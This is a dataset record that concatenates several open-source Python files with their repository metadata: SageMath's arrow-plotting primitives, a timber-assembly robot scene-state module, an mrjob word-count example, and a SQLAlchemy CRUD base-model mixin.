**options) def _repr_(self): """ Text representation of an arrow graphics primitive. EXAMPLES:: sage: from sage.plot.arrow import Arrow sage: Arrow(0,0,2,3,{})._repr_() 'Arrow from (0.0,0.0) to (2.0,3.0)' """ return "Arrow from (%s,%s) to (%s,%s)" % (self.xtail, self.ytail, self.xhead, self.yhead) def _render_on_subplot(self, subplot): r""" Render this arrow in a subplot. This is the key function that defines how this arrow graphics primitive is rendered in matplotlib's library. EXAMPLES: This function implicitly ends up rendering this arrow on a matplotlib subplot:: sage: arrow((0,1), (2,-1)) Graphics object consisting of 1 graphics primitive TESTS: The length of the ends (shrinkA and shrinkB) should not depend on the width of the arrow, because Matplotlib already takes this into account. See :trac:`12836`:: sage: fig = Graphics().matplotlib() sage: sp = fig.add_subplot(1,1,1, label='axis1') sage: a = arrow((0,0), (1,1)) sage: b = arrow((0,0), (1,1), width=20) sage: p1 = a[0]._render_on_subplot(sp) sage: p2 = b[0]._render_on_subplot(sp) sage: p1.shrinkA == p2.shrinkA True sage: p1.shrinkB == p2.shrinkB True Dashed arrows should have solid arrowheads, :trac:`12852`. This test saves the plot of a dashed arrow to an EPS file. Within the EPS file, ``stroke`` will be called twice: once to draw the line, and again to draw the arrowhead. We check that both calls do not occur while the dashed line style is enabled:: sage: a = arrow((0,0), (1,1), linestyle='dashed') sage: filename = tmp_filename(ext='.eps') sage: a.save(filename=filename) sage: with open(filename, 'r') as f: ....: contents = f.read().replace('\n', ' ') sage: two_stroke_pattern = r'setdash.*stroke.*stroke.*setdash.*setdash' sage: import re sage: two_stroke_re = re.compile(two_stroke_pattern) sage: two_stroke_re.search(contents) is None True """ from sage.plot.misc import get_matplotlib_linestyle options = self.options() head = options.pop('head') if head == 0: style = '<|-' elif head == 1: style = '-|>' elif head == 2: style = '<|-|>' else: raise KeyError('head parameter must be one of 0 (start), 1 (end) or 2 (both).') width = float(options['width']) arrowshorten_end = float(options.get('arrowshorten', 0)) / 2.0 arrowsize = float(options.get('arrowsize', 5)) head_width = arrowsize head_length = arrowsize * 2.0 color = to_mpl_color(options['rgbcolor']) from matplotlib.patches import FancyArrowPatch p = FancyArrowPatch((self.xtail, self.ytail), (self.xhead, self.yhead), lw=width, arrowstyle='%s,head_width=%s,head_length=%s' % (style, head_width, head_length), shrinkA=arrowshorten_end, shrinkB=arrowshorten_end, fc=color, ec=color, linestyle=get_matplotlib_linestyle(options['linestyle'], return_type='long')) p.set_zorder(options['zorder']) p.set_label(options['legend_label']) if options['linestyle'] != 'solid': # The next few lines work around a design issue in matplotlib. # Currently, the specified linestyle is used to draw both the path # and the arrowhead. If linestyle is 'dashed', this looks really # odd. This code is from Jae-Joon Lee in response to a post to the # matplotlib mailing list. # See http://sourceforge.net/mailarchive/forum.php?thread_name=CAG%3DuJ%2Bnw2dE05P9TOXTz_zp-mGP3cY801vMH7yt6vgP9_WzU8w%40mail.gmail.com&forum_name=matplotlib-users import matplotlib.patheffects as pe class CheckNthSubPath(object): def __init__(self, patch, n): """ creates an callable object that returns True if the provided path is the n-th path from the patch. """ self._patch = patch self._n = n def get_paths(self, renderer): self._patch.set_dpi_cor(renderer.points_to_pixels(1.)) paths, fillables = self._patch.get_path_in_displaycoord() return paths def __call__(self, renderer, gc, tpath, affine, rgbFace): path = self.get_paths(renderer)[self._n] vert1, code1 = path.vertices, path.codes import numpy as np return np.array_equal(vert1, tpath.vertices) and np.array_equal(code1, tpath.codes) class ConditionalStroke(pe.RendererBase): def __init__(self, condition_func, pe_list): """ path effect that is only applied when the condition_func returns True. """ super(ConditionalStroke, self).__init__() self._pe_list = pe_list self._condition_func = condition_func def draw_path(self, renderer, gc, tpath, affine, rgbFace): if self._condition_func(renderer, gc, tpath, affine, rgbFace): for pe1 in self._pe_list: pe1.draw_path(renderer, gc, tpath, affine, rgbFace) pe1 = ConditionalStroke(CheckNthSubPath(p, 0), [pe.Stroke()]) pe2 = ConditionalStroke(CheckNthSubPath(p, 1), [pe.Stroke(dashes={'dash_offset': 0, 'dash_list': None})]) p.set_path_effects([pe1, pe2]) subplot.add_patch(p) return p def arrow(tailpoint=None, headpoint=None, **kwds): """ Returns either a 2-dimensional or 3-dimensional arrow depending on value of points. For information regarding additional arguments, see either arrow2d? or arrow3d?. EXAMPLES:: sage: arrow((0,0), (1,1)) Graphics object consisting of 1 graphics primitive .. PLOT:: sphinx_plot(arrow((0,0), (1,1))) :: sage: arrow((0,0,1), (1,1,1)) Graphics3d Object .. PLOT:: sphinx_plot(arrow((0,0,1), (1,1,1))) """ try: return arrow2d(tailpoint, headpoint, **kwds) except ValueError: from sage.plot.plot3d.shapes import arrow3d return arrow3d(tailpoint, headpoint, **kwds) @rename_keyword(color='rgbcolor') @options(width=2, rgbcolor=(0,0,1), zorder=2, head=1, linestyle='solid', legend_label=None) def arrow2d(tailpoint=None, headpoint=None, path=None, **options): """ If ``tailpoint`` and ``headpoint`` are provided, returns an arrow from (xtail, ytail) to (xhead, yhead). If ``tailpoint`` or ``headpoint`` is None and ``path`` is not None, returns an arrow along the path. (See further info on paths in :class:`bezier_path`). INPUT: - ``tailpoint`` - the starting point of the arrow - ``headpoint`` - where the arrow is pointing to - ``path`` - the list of points and control points (see bezier_path for detail) that the arrow will follow from source to destination - ``head`` - 0, 1 or 2, whether to draw the head at the start (0), end (1) or both (2) of the path (using 0 will swap headpoint and tailpoint). This is ignored in 3D plotting. - ``linestyle`` - (default: ``'solid'``) The style of the line, which is one of ``'dashed'``, ``'dotted'``, ``'solid'``, ``'dashdot'``, or ``'--'``, ``':'``, ``'-'``, ``'-.'``, respectively. - ``width`` - (default: 2) the width of the arrow shaft, in points - ``color`` - (default: (0,0,1)) the color of the arrow (as an RGB tuple or a string) - ``hue`` - the color of the arrow (as a number) - ``arrowsize`` - the size of the arrowhead - ``arrowshorten`` - the length in points to shorten the arrow (ignored if using path parameter) - ``legend_label`` - the label for this item in the legend - ``legend_color`` - the color for the legend label - ``zorder`` - the layer level to draw the arrow-- note that this is ignored in 3D plotting. EXAMPLES: A straight, blue arrow:: sage: arrow2d((1,1), (3,3)) Graphics object consisting of 1 graphics primitive .. PLOT:: sphinx_plot(arrow2d((1,1), (3,3))) Make a red arrow:: sage: arrow2d((-1,-1), (2,3), color=(1,0,0)) Graphics object consisting of 1 graphics primitive .. PLOT:: sphinx_plot(arrow2d((-1,-1), (2,3), color=(1,0,0))) :: sage: arrow2d((-1,-1), (2,3), color='red') Graphics object consisting of 1 graphics primitive .. PLOT:: sphinx_plot(arrow2d((-1,-1), (2,3), color='red')) You can change the width of an arrow:: sage: arrow2d((1,1), (3,3), width=5, arrowsize=15) Graphics object consisting of 1 graphics primitive .. PLOT:: P = arrow2d((1,1), (3,3), width=5, arrowsize=15) sphinx_plot(P) Use a dashed line instead of a solid one for the arrow:: sage: arrow2d((1,1), (3,3), linestyle='dashed') Graphics object consisting of 1 graphics primitive sage: arrow2d((1,1), (3,3), linestyle='--') Graphics object consisting of 1 graphics primitive .. PLOT:: P = arrow2d((1,1), (3,3), linestyle='--') sphinx_plot(P) A pretty circle of arrows:: sage: sum([arrow2d((0,0), (cos(x),sin(x)), hue=x/(2*pi)) for x in [0..2*pi,step=0.1]]) Graphics object consisting of 63 graphics primitives .. PLOT:: P = sum([arrow2d((0,0), (cos(x*0.1),sin(x*0.1)), hue=x/(20*pi)) for x in range(floor(20*pi)+1)]) sphinx_plot(P) If we want to draw the arrow between objects, for example, the boundaries of two lines, we can use the ``arrowshorten`` option to make the arrow shorter by a certain number of points:: sage: L1 = line([(0,0), (1,0)], thickness=10) sage: L2 = line([(0,1), (1,1)], thickness=10) sage: A = arrow2d((0.5,0), (0.5,1), arrowshorten=10, rgbcolor=(1,0,0)) sage: L1 + L2 + A Graphics object consisting of 3 graphics primitives .. PLOT:: L1 = line([(0,0), (1,0)],thickness=10) L2 = line([(0,1), (1,1)], thickness=10) A = arrow2d((0.5,0), (0.5,1), arrowshorten=10, rgbcolor=(1,0,0)) sphinx_plot(L1 + L2 + A) If BOTH ``headpoint`` and ``tailpoint`` are None, then an empty plot is returned:: sage: arrow2d(headpoint=None, tailpoint=None) Graphics object consisting of 0 graphics primitives We can also draw an arrow with a legend:: sage: arrow((0,0), (0,2), legend_label='up', legend_color='purple') Graphics object consisting of 1 graphics primitive .. PLOT:: P = arrow((0,0), (0,2), legend_label='up', legend_color='purple') sphinx_plot(P) Extra options will get passed on to :meth:`Graphics.show()`, as long as they are valid:: sage: arrow2d((-2,2), (7,1), frame=True) Graphics object consisting of 1 graphics primitive .. PLOT:: sphinx_plot(arrow2d((-2,2), (7,1), frame=True)) :: sage: arrow2d((-2,2), (7,1)).show(frame=True) """ from sage.plot.all import Graphics g = Graphics() g._set_extra_kwds(Graphics._extract_kwds_for_show(options)) if headpoint is not None and tailpoint is not None: xtail, ytail = tailpoint xhead, yhead = headpoint g.add_primitive(Arrow(xtail, ytail, xhead, yhead, options=options)) elif path is not None: g.add_primitive(CurveArrow(path, options=options)) elif tailpoint is None and headpoint is None: return g else: raise TypeError('Arrow requires either both headpoint and tailpoint or a path parameter.') if options['legend_label']: g.legend(True) g._legend_colors = [options['legend_color']] return g
37.894009
175
0.557177
from sage.plot.primitive import GraphicPrimitive from sage.misc.decorators import options, rename_keyword from sage.plot.colors import to_mpl_color class CurveArrow(GraphicPrimitive): def __init__(self, path, options): import numpy as np self.path = path codes = [1] + (len(self.path[0])-1)*[len(self.path[0])] vertices = self.path[0] for curve in self.path[1:]: vertices += curve codes += (len(curve))*[len(curve)+1] self.codes = codes self.vertices = np.array(vertices, np.float) GraphicPrimitive.__init__(self, options) def get_minmax_data(self): return {'xmin': self.vertices[:,0].min(), 'xmax': self.vertices[:,0].max(), 'ymin': self.vertices[:,1].min(), 'ymax': self.vertices[:,1].max()} def _allowed_options(self): return {'width': 'The width of the shaft of the arrow, in points.', 'rgbcolor': 'The color as an RGB tuple.', 'hue': 'The color given as a hue.', 'legend_label': 'The label for this item in the legend.', 'legend_color': 'The color of the legend text.', 'arrowstyle': 'todo', 'arrowsize': 'The size of the arrowhead', 'thickness': 'The thickness of the arrow.', 'zorder': '2-d only: The layer level in which to draw', 'head': '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)', 'linestyle': "2d only: The style of the line, which is one of " "'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', " "respectively."} def _repr_(self): return "CurveArrow from %s to %s" % (self.path[0][0], self.path[-1][-1]) def _render_on_subplot(self, subplot): from sage.plot.misc import get_matplotlib_linestyle options = self.options() width = float(options['width']) head = options.pop('head') if head == 0: style = '<|-' elif head == 1: style = '-|>' elif head == 2: style = '<|-|>' else: raise KeyError('head parameter must be one of 0 (start), 1 (end) or 2 (both).') arrowsize = float(options.get('arrowsize', 5)) head_width = arrowsize head_length = arrowsize * 2.0 color = to_mpl_color(options['rgbcolor']) from matplotlib.patches import FancyArrowPatch from matplotlib.path import Path bpath = Path(self.vertices, self.codes) p = FancyArrowPatch(path=bpath, lw=width, arrowstyle='%s,head_width=%s,head_length=%s' % (style, head_width, head_length), fc=color, ec=color, linestyle=get_matplotlib_linestyle(options['linestyle'], return_type='long')) p.set_zorder(options['zorder']) p.set_label(options['legend_label']) subplot.add_patch(p) return p class Arrow(GraphicPrimitive): def __init__(self, xtail, ytail, xhead, yhead, options): self.xtail = float(xtail) self.xhead = float(xhead) self.ytail = float(ytail) self.yhead = float(yhead) GraphicPrimitive.__init__(self, options) def get_minmax_data(self): return {'xmin': min(self.xtail, self.xhead), 'xmax': max(self.xtail, self.xhead), 'ymin': min(self.ytail, self.yhead), 'ymax': max(self.ytail, self.yhead)} def _allowed_options(self): return {'width': 'The width of the shaft of the arrow, in points.', 'rgbcolor': 'The color as an RGB tuple.', 'hue': 'The color given as a hue.', 'arrowshorten': 'The length in points to shorten the arrow.', 'arrowsize': 'The size of the arrowhead', 'thickness': 'The thickness of the arrow.', 'legend_label': 'The label for this item in the legend.', 'legend_color': 'The color of the legend text.', 'zorder': '2-d only: The layer level in which to draw', 'head': '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)', 'linestyle': "2d only: The style of the line, which is one of " "'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', " "respectively."} def _plot3d_options(self, options=None): if options is None: options = self.options() options = dict(self.options()) options_3d = {} if 'width' in options: options_3d['thickness'] = options['width'] del options['width'] if 'zorder' in options: del options['zorder'] if 'head' in options: del options['head'] if 'linestyle' in options: del options['linestyle'] options_3d.update(GraphicPrimitive._plot3d_options(self, options)) return options_3d def plot3d(self, ztail=0, zhead=0, **kwds): from sage.plot.plot3d.shapes2 import line3d options = self._plot3d_options() options.update(kwds) return line3d([(self.xtail, self.ytail, ztail), (self.xhead, self.yhead, zhead)], arrow_head=True, **options) def _repr_(self): return "Arrow from (%s,%s) to (%s,%s)" % (self.xtail, self.ytail, self.xhead, self.yhead) def _render_on_subplot(self, subplot): from sage.plot.misc import get_matplotlib_linestyle options = self.options() head = options.pop('head') if head == 0: style = '<|-' elif head == 1: style = '-|>' elif head == 2: style = '<|-|>' else: raise KeyError('head parameter must be one of 0 (start), 1 (end) or 2 (both).') width = float(options['width']) arrowshorten_end = float(options.get('arrowshorten', 0)) / 2.0 arrowsize = float(options.get('arrowsize', 5)) head_width = arrowsize head_length = arrowsize * 2.0 color = to_mpl_color(options['rgbcolor']) from matplotlib.patches import FancyArrowPatch p = FancyArrowPatch((self.xtail, self.ytail), (self.xhead, self.yhead), lw=width, arrowstyle='%s,head_width=%s,head_length=%s' % (style, head_width, head_length), shrinkA=arrowshorten_end, shrinkB=arrowshorten_end, fc=color, ec=color, linestyle=get_matplotlib_linestyle(options['linestyle'], return_type='long')) p.set_zorder(options['zorder']) p.set_label(options['legend_label']) if options['linestyle'] != 'solid': import matplotlib.patheffects as pe class CheckNthSubPath(object): def __init__(self, patch, n): self._patch = patch self._n = n def get_paths(self, renderer): self._patch.set_dpi_cor(renderer.points_to_pixels(1.)) paths, fillables = self._patch.get_path_in_displaycoord() return paths def __call__(self, renderer, gc, tpath, affine, rgbFace): path = self.get_paths(renderer)[self._n] vert1, code1 = path.vertices, path.codes import numpy as np return np.array_equal(vert1, tpath.vertices) and np.array_equal(code1, tpath.codes) class ConditionalStroke(pe.RendererBase): def __init__(self, condition_func, pe_list): super(ConditionalStroke, self).__init__() self._pe_list = pe_list self._condition_func = condition_func def draw_path(self, renderer, gc, tpath, affine, rgbFace): if self._condition_func(renderer, gc, tpath, affine, rgbFace): for pe1 in self._pe_list: pe1.draw_path(renderer, gc, tpath, affine, rgbFace) pe1 = ConditionalStroke(CheckNthSubPath(p, 0), [pe.Stroke()]) pe2 = ConditionalStroke(CheckNthSubPath(p, 1), [pe.Stroke(dashes={'dash_offset': 0, 'dash_list': None})]) p.set_path_effects([pe1, pe2]) subplot.add_patch(p) return p def arrow(tailpoint=None, headpoint=None, **kwds): try: return arrow2d(tailpoint, headpoint, **kwds) except ValueError: from sage.plot.plot3d.shapes import arrow3d return arrow3d(tailpoint, headpoint, **kwds) @rename_keyword(color='rgbcolor') @options(width=2, rgbcolor=(0,0,1), zorder=2, head=1, linestyle='solid', legend_label=None) def arrow2d(tailpoint=None, headpoint=None, path=None, **options): from sage.plot.all import Graphics g = Graphics() g._set_extra_kwds(Graphics._extract_kwds_for_show(options)) if headpoint is not None and tailpoint is not None: xtail, ytail = tailpoint xhead, yhead = headpoint g.add_primitive(Arrow(xtail, ytail, xhead, yhead, options=options)) elif path is not None: g.add_primitive(CurveArrow(path, options=options)) elif tailpoint is None and headpoint is None: return g else: raise TypeError('Arrow requires either both headpoint and tailpoint or a path parameter.') if options['legend_label']: g.legend(True) g._legend_colors = [options['legend_color']] return g
true
true
f7290d71439131c7316cb803ec52d5d227b0a777
7,254
py
Python
src/integral_timber_joints/process/state.py
gramaziokohler/integral_timber_joints
70e75a66e13b5ada580fcffc58879f5fcb8fce32
[ "MIT" ]
3
2021-09-16T13:08:32.000Z
2022-02-21T17:20:21.000Z
src/integral_timber_joints/process/state.py
gramaziokohler/integral_timber_joints
70e75a66e13b5ada580fcffc58879f5fcb8fce32
[ "MIT" ]
80
2021-09-06T09:55:38.000Z
2022-03-22T18:44:24.000Z
src/integral_timber_joints/process/state.py
gramaziokohler/integral_timber_joints
70e75a66e13b5ada580fcffc58879f5fcb8fce32
[ "MIT" ]
null
null
null
try: from typing import Dict, List, Optional, Tuple from integral_timber_joints.process import RobotClampAssemblyProcess except: pass import itertools from compas.data import Data from compas.geometry import Frame from compas.geometry.transformations.transformation import Transformation from compas.robots import Configuration class SceneState(Data): """ This is a dictionary like object that holds all the states of all objects in a given moment. This static moment is refered to as a scene. A movement has a start scene and end scene. """ def __init__(self, process=None): # type: (RobotClampAssemblyProcess) -> None self.object_state_dict = {} self.object_keys = [] if process is not None: assembly = process.assembly # self.beam_states = {} # type: dict[str, list] # compile a list of keys that should contain state values for beam_id in assembly.sequence: self.object_keys.append((beam_id, 'f')) self.object_keys.append((beam_id, 'a')) for tool_id in process.tool_ids: self.object_keys.append((tool_id, 'f')) self.object_keys.append((tool_id, 'a')) self.object_keys.append((tool_id, 'c')) # Singleton items self.object_keys.append(('tool_changer', 'f')) # TC Base Frame self.object_keys.append(('tool_changer', 'a')) # Always True self.object_keys.append(('robot', 'f')) # Robot Target Frame self.object_keys.append(('robot', 'c')) # Full Configuration @classmethod def from_data(cls, data): """Construct a RobotClampAssemblyProcess from structured data. Overridden the from_data method because we have to assign self to dependency.process """ scene = cls() scene.data = data return scene def to_data(self): return self.data def __getitem__(self, key): if key not in self.object_state_dict: return None else: return self.object_state_dict[key] def __setitem__(self, key, value): self.object_state_dict[key] = value def __len__(self): return len(self.object_state_dict) def __contains__(self, key): return key in self.object_state_dict @property def data(self): # Flatten Tuple dict keys to strings flattened_dict = {} for key, value in self.object_state_dict.items(): flattened_dict[str(key)] = value data = { 'object_keys': self.object_keys, 'flattened_dict': flattened_dict, } return data @data.setter def data(self, data): self.object_keys = data.get('object_keys', []) # Unflatten dict keys to Tuples import ast flattened_dict = data.get('flattened_dict', {}) for key, value in flattened_dict.items(): self[ast.literal_eval(key)] = value def has_unknown_state(self, skip_robot_config=True): # type: (RobotClampAssemblyProcess) -> bool return len(list(self.keys_with_unknown_state, skip_robot_config)) > 0 def keys_with_unknown_state(self, skip_robot_config=True): for key in self.object_keys: if skip_robot_config and key == ('robot', 'c'): continue if key not in self: yield key class ObjectState(object): """ Base class of a state object. Note that the State object should exist in a state dictionary where the key refers to an object id. `ObjectState.current_frame` - A frame describing the loaction of an object. `None` can be used to represent an un-transformed state. `ObjectState.kinematic_config` - A dictionary to describe the kinematic configuration of a RobotModel or ToolModel (such as Clamp and Gripper) - The dictionary uses `joint names` as keys and `values` in degrees or millimeters. - `None` can be used for Beams and Env Objects that does not have kinematic state `ObjectState.attached_to_robot` - Bool value describing if an object is attached to the robot. - Note that the ToolChanger is always attached to the robot's flange. (Level 1) - Gripper or Clamp can be attached to a robot's ToolChanger. (Level 2) - Beam can only be attached to a Gripper or Clamp (Level 3) """ def __init__(self, current_frame=None, attached_to_robot=False, kinematic_config=None): self.current_frame = current_frame # type: Frame self.attached_to_robot = attached_to_robot # type: bool self.kinematic_config = kinematic_config # type: ignore def to_data(self): """Simpliest way to get this class serialized. """ return self.data @classmethod def from_data(cls, data): """Construct a Movement from structured data. Subclass must add their properity to the data properity. """ state = cls() state.data = data return state @property def data(self): data = { 'current_frame': self.current_frame, 'kinematic_config': self.kinematic_config, 'attached_to_robot': self.attached_to_robot, } return data @data.setter def data(self, data): self.current_frame = data.get('current_frame', None) self.kinematic_config = data.get('kinematic_config', None) self.attached_to_robot = data.get('attached_to_robot', False) def __repr__(self): return self.__str__() def __str__(self): return "State: current frame: {} | config: {} | attached to robot: {}".format( self.current_frame, self.kinematic_config, self.attached_to_robot) def __eq__(self, other): if not hasattr(other, 'current_frame') or not hasattr(other, 'attached_to_robot') or not hasattr(other, 'kinematic_config'): return False if self.current_frame != other.current_frame: return False if self.attached_to_robot != other.attached_to_robot: return False if self.kinematic_config != other.kinematic_config: return False return True def get_object_from_flange(object_states, object_id): flange_frame = object_states['robot'].current_frame object_frame = object_states[object_id].current_frame world_from_flange = Transformation.from_frame(flange_frame) world_from_object = Transformation.from_frame(object_frame) return world_from_object.inverse() * world_from_flange def copy_state_dict(target_state_dict, source_state_dict, clear=False, deep_copy=False): # type: (dict[str, ObjectState], dict[str, ObjectState], bool, bool) -> None """Copy one state dictionary to another. If `clear = True`, keys not present in the source_state_dict are removed. If `deep_copy = True`, deep copy is made for each object State """ if clear: target_state_dict.clear() for object_id, state in source_state_dict.items(): if deep_copy: target_state_dict[object_id] = ObjectState.from_data(state.to_data()) else: target_state_dict[object_id] = state
35.73399
132
0.656465
try: from typing import Dict, List, Optional, Tuple from integral_timber_joints.process import RobotClampAssemblyProcess except: pass import itertools from compas.data import Data from compas.geometry import Frame from compas.geometry.transformations.transformation import Transformation from compas.robots import Configuration class SceneState(Data): def __init__(self, process=None): self.object_state_dict = {} self.object_keys = [] if process is not None: assembly = process.assembly for beam_id in assembly.sequence: self.object_keys.append((beam_id, 'f')) self.object_keys.append((beam_id, 'a')) for tool_id in process.tool_ids: self.object_keys.append((tool_id, 'f')) self.object_keys.append((tool_id, 'a')) self.object_keys.append((tool_id, 'c')) self.object_keys.append(('tool_changer', 'f')) self.object_keys.append(('tool_changer', 'a')) self.object_keys.append(('robot', 'f')) self.object_keys.append(('robot', 'c')) @classmethod def from_data(cls, data): scene = cls() scene.data = data return scene def to_data(self): return self.data def __getitem__(self, key): if key not in self.object_state_dict: return None else: return self.object_state_dict[key] def __setitem__(self, key, value): self.object_state_dict[key] = value def __len__(self): return len(self.object_state_dict) def __contains__(self, key): return key in self.object_state_dict @property def data(self): flattened_dict = {} for key, value in self.object_state_dict.items(): flattened_dict[str(key)] = value data = { 'object_keys': self.object_keys, 'flattened_dict': flattened_dict, } return data @data.setter def data(self, data): self.object_keys = data.get('object_keys', []) import ast flattened_dict = data.get('flattened_dict', {}) for key, value in flattened_dict.items(): self[ast.literal_eval(key)] = value def has_unknown_state(self, skip_robot_config=True): return len(list(self.keys_with_unknown_state, skip_robot_config)) > 0 def keys_with_unknown_state(self, skip_robot_config=True): for key in self.object_keys: if skip_robot_config and key == ('robot', 'c'): continue if key not in self: yield key class ObjectState(object): def __init__(self, current_frame=None, attached_to_robot=False, kinematic_config=None): self.current_frame = current_frame self.attached_to_robot = attached_to_robot self.kinematic_config = kinematic_config def to_data(self): return self.data @classmethod def from_data(cls, data): state = cls() state.data = data return state @property def data(self): data = { 'current_frame': self.current_frame, 'kinematic_config': self.kinematic_config, 'attached_to_robot': self.attached_to_robot, } return data @data.setter def data(self, data): self.current_frame = data.get('current_frame', None) self.kinematic_config = data.get('kinematic_config', None) self.attached_to_robot = data.get('attached_to_robot', False) def __repr__(self): return self.__str__() def __str__(self): return "State: current frame: {} | config: {} | attached to robot: {}".format( self.current_frame, self.kinematic_config, self.attached_to_robot) def __eq__(self, other): if not hasattr(other, 'current_frame') or not hasattr(other, 'attached_to_robot') or not hasattr(other, 'kinematic_config'): return False if self.current_frame != other.current_frame: return False if self.attached_to_robot != other.attached_to_robot: return False if self.kinematic_config != other.kinematic_config: return False return True def get_object_from_flange(object_states, object_id): flange_frame = object_states['robot'].current_frame object_frame = object_states[object_id].current_frame world_from_flange = Transformation.from_frame(flange_frame) world_from_object = Transformation.from_frame(object_frame) return world_from_object.inverse() * world_from_flange def copy_state_dict(target_state_dict, source_state_dict, clear=False, deep_copy=False): if clear: target_state_dict.clear() for object_id, state in source_state_dict.items(): if deep_copy: target_state_dict[object_id] = ObjectState.from_data(state.to_data()) else: target_state_dict[object_id] = state
true
true
f7290e7b579df05a7b491debaaa1d6c44c7e50e1
1,409
py
Python
mrjob/examples/mr_wc.py
cleemesser/mrjob
f24991ffae9e7a2dad9fd3403d5e96635ededa4a
[ "Apache-2.0" ]
null
null
null
mrjob/examples/mr_wc.py
cleemesser/mrjob
f24991ffae9e7a2dad9fd3403d5e96635ededa4a
[ "Apache-2.0" ]
null
null
null
mrjob/examples/mr_wc.py
cleemesser/mrjob
f24991ffae9e7a2dad9fd3403d5e96635ededa4a
[ "Apache-2.0" ]
null
null
null
# Copyright 2009-2010 Yelp # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """An implementation of wc as an MRJob. This is meant as an example of why mapper_final is useful.""" from mrjob.job import MRJob class MRWordCountUtility(MRJob): def __init__(self, *args, **kwargs): super(MRWordCountUtility, self).__init__(*args, **kwargs) self.chars = 0 self.words = 0 self.lines = 0 def mapper(self, _, line): if False: yield # I'm a generator! self.chars += len(line) + 1 # +1 for newline self.words += sum(1 for word in line.split() if word.strip()) self.lines += 1 def mapper_final(self): yield('chars', self.chars) yield('words', self.words) yield('lines', self.lines) def reducer(self, key, values): yield(key, sum(values)) if __name__ == '__main__': MRWordCountUtility.run()
29.978723
74
0.66785
from mrjob.job import MRJob class MRWordCountUtility(MRJob): def __init__(self, *args, **kwargs): super(MRWordCountUtility, self).__init__(*args, **kwargs) self.chars = 0 self.words = 0 self.lines = 0 def mapper(self, _, line): if False: yield self.chars += len(line) + 1 # +1 for newline self.words += sum(1 for word in line.split() if word.strip()) self.lines += 1 def mapper_final(self): yield('chars', self.chars) yield('words', self.words) yield('lines', self.lines) def reducer(self, key, values): yield(key, sum(values)) if __name__ == '__main__': MRWordCountUtility.run()
true
true
f7290f75e2fb79fe8a9681c9242e628e2d363fde
2,843
py
Python
doom/database.py
iiCodeThings/admin
851ebcb8b90d4bea4bd7468ed403ec13fca801ee
[ "MIT" ]
1
2022-02-16T08:20:12.000Z
2022-02-16T08:20:12.000Z
doom/database.py
iiCodeThings/doom
a04f239abfefc4c8b70ec7c7b00b42622ec13a86
[ "MIT" ]
null
null
null
doom/database.py
iiCodeThings/doom
a04f239abfefc4c8b70ec7c7b00b42622ec13a86
[ "MIT" ]
null
null
null
import datetime from .extensions import db Column = db.Column relationship = db.relationship class CRUDMixin(object): """Mixin that adds convenience methods for CRUD (create, read, update, delete) operations.""" @classmethod def create(cls, **kwargs): """Create a new record and save it the database.""" instance = cls(**kwargs) return instance.save() def update(self, commit=True, **kwargs): """Update specific fields of a record.""" for attr, value in kwargs.items(): setattr(self, attr, value) if commit: return self.save() return self def save(self, commit=True): """Save the record.""" db.session.add(self) if commit: db.session.commit() return self def delete(self, commit: bool = True) -> None: """Remove the record from the database.""" db.session.delete(self) if commit: return db.session.commit() return class Model(CRUDMixin, db.Model): """Base model class that includes CRUD convenience methods.""" __abstract__ = True def to_dict(self, ignored_fields=['password'], added_params=None): result = dict((col.name, getattr(self, col.name)) for col in self.__table__.columns) for k, v in result.items(): if type(result[k]) in [datetime.datetime, datetime.date]: result[k] = v.strftime("%Y-%m-%d %H:%M:%S") for ignore_field in ignored_fields: if ignore_field in result.keys(): result.pop(ignore_field) if added_params: for key in added_params.keys(): result[key] = added_params[key] return result class PkModel(Model): """Base model class that includes CRUD convenience methods, plus adds a 'primary key' column named ``id``.""" __abstract__ = True id = Column(db.Integer, primary_key=True) @classmethod def get_by_id(cls, record_id): """Get record by ID.""" if any( ( isinstance(record_id, (str, bytes)) and record_id.isdigit(), isinstance(record_id, (int, float)), ) ): return cls.query.get(int(record_id)) return None def reference_col( tablename, nullable=False, pk_name="id", foreign_key_kwargs=None, column_kwargs=None ): """Column that adds primary key foreign key reference. Usage: :: category_id = reference_col('category') category = relationship('Category', backref='categories') """ foreign_key_kwargs = foreign_key_kwargs or {} column_kwargs = column_kwargs or {} return Column( db.ForeignKey(f"{tablename}.{pk_name}", **foreign_key_kwargs), nullable=nullable, **column_kwargs, )
28.43
113
0.602884
import datetime from .extensions import db Column = db.Column relationship = db.relationship class CRUDMixin(object): @classmethod def create(cls, **kwargs): instance = cls(**kwargs) return instance.save() def update(self, commit=True, **kwargs): for attr, value in kwargs.items(): setattr(self, attr, value) if commit: return self.save() return self def save(self, commit=True): db.session.add(self) if commit: db.session.commit() return self def delete(self, commit: bool = True) -> None: db.session.delete(self) if commit: return db.session.commit() return class Model(CRUDMixin, db.Model): __abstract__ = True def to_dict(self, ignored_fields=['password'], added_params=None): result = dict((col.name, getattr(self, col.name)) for col in self.__table__.columns) for k, v in result.items(): if type(result[k]) in [datetime.datetime, datetime.date]: result[k] = v.strftime("%Y-%m-%d %H:%M:%S") for ignore_field in ignored_fields: if ignore_field in result.keys(): result.pop(ignore_field) if added_params: for key in added_params.keys(): result[key] = added_params[key] return result class PkModel(Model): __abstract__ = True id = Column(db.Integer, primary_key=True) @classmethod def get_by_id(cls, record_id): if any( ( isinstance(record_id, (str, bytes)) and record_id.isdigit(), isinstance(record_id, (int, float)), ) ): return cls.query.get(int(record_id)) return None def reference_col( tablename, nullable=False, pk_name="id", foreign_key_kwargs=None, column_kwargs=None ): foreign_key_kwargs = foreign_key_kwargs or {} column_kwargs = column_kwargs or {} return Column( db.ForeignKey(f"{tablename}.{pk_name}", **foreign_key_kwargs), nullable=nullable, **column_kwargs, )
true
true
f7290fa324d8e90eca6e3ad67c7ef41b58f33c7b
11,952
py
Python
Linear_Ridge_Regression .py
Nirmal1313/Regression-Methods
b1f885dc798ca4aae47661e0a27fe0e21e4ee4e0
[ "MIT" ]
null
null
null
Linear_Ridge_Regression .py
Nirmal1313/Regression-Methods
